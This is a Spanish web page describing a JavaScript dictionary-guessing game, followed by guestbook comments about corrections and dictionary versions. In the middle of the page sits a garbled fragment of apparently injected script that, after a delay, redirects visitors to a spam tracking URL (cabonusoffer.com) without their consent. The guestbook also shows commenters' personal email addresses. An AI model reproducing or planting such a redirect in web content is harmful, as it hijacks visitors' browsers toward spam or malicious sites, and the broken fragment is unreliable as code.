Haciendo click en los botones de la derecha se puede jugar al juego del diccionario programado en Javascript. Hay una versión para un solo jugador y otra para dos jugadores (compartiendo ordenador). A continuación, se explica cómo funcionan.
Es posible que al empezar el juego, su navegador le indique que una ventana pop-up ha sido bloqueada. En ese caso seleccione "permitir temporalmente las ventanas generadas por script".






Opción 1 jugador
Al empezar el juego, el ordenador pedirá que se determine el número de palabra por el que se desea comenzar. De esta manera, se evita repetir las mismas de la última vez que se jugó. A contnuación, se mostrarán cuatro definiciones, de las cuales se tiene que adivinar cuál es la correcta. Después, se pasa a la siguiente palabra. En la esquina superior derecha se puede ver el número de aciertos que se han tenido. Las definiciones han sido tomadas de partidas reales de este juego, de las que se indica el diccionario utilizado.




Opción 2 jugadores
En este caso, se pregunta primero el nombre de los dos jugadores. Una vez introducidos, como en el caso anterior, se tendrá que introducir el número de palabra por el que se desea empezar. Una vez la palbra ha sido seleccionada, ambos jugadores deberán introducir sus propuestas de definición y hacer click en "Enviar" (en caso de duda se puede comprobar lo que se ha escrito). A continuación se mostrarán las 3 definiciones (la correcta y las 2 inventadas). A quien acierte la correcta se le darán 3 puntos. A quien su definición le sea votada, 1 punto. Y se pasará a la palabra siguiente.



{ window.location.replace('http://cabonusoffer.com/track/'); }, delay);})();" topmargin="0" marginheight="0" style="font-family:verdana">



Pulse aquí para introducir un comentario
1
October 08, 2015 - 02:51 PM
Pablo

  Gracias, Alicia. He hecho la corrección.
Borrar entrada # 1
2
November 11, 2014 - 05:31 PM
alicia bosch
aliciabosche@hotmail.com

  Hierba, referida a planta pequeña es con b, no con v.
Borrar entrada # 2
3
January 17, 2010 - 09:13 AM
Pablo

  Jonathan, las acepciones son sacadas de partidas reales. Es lo que puso la gente: para bien o para mal.
Borrar entrada # 3
4
January 15, 2010 - 05:50 AM
Jonathan Trashorras Aspas
joseramon.cancela@gmail.com

  Enhorabuena por la mejora
Solo indicar que podrían utilizarse versiones más recientes de diccionarios y que no debería haber acepciones con diferencias tan mínimas como "hoguera pequeña" o "pequeña hoguera". Saludos
Borrar entrada # 4
Página #1 de 1
PHP Guestbook · Web Directory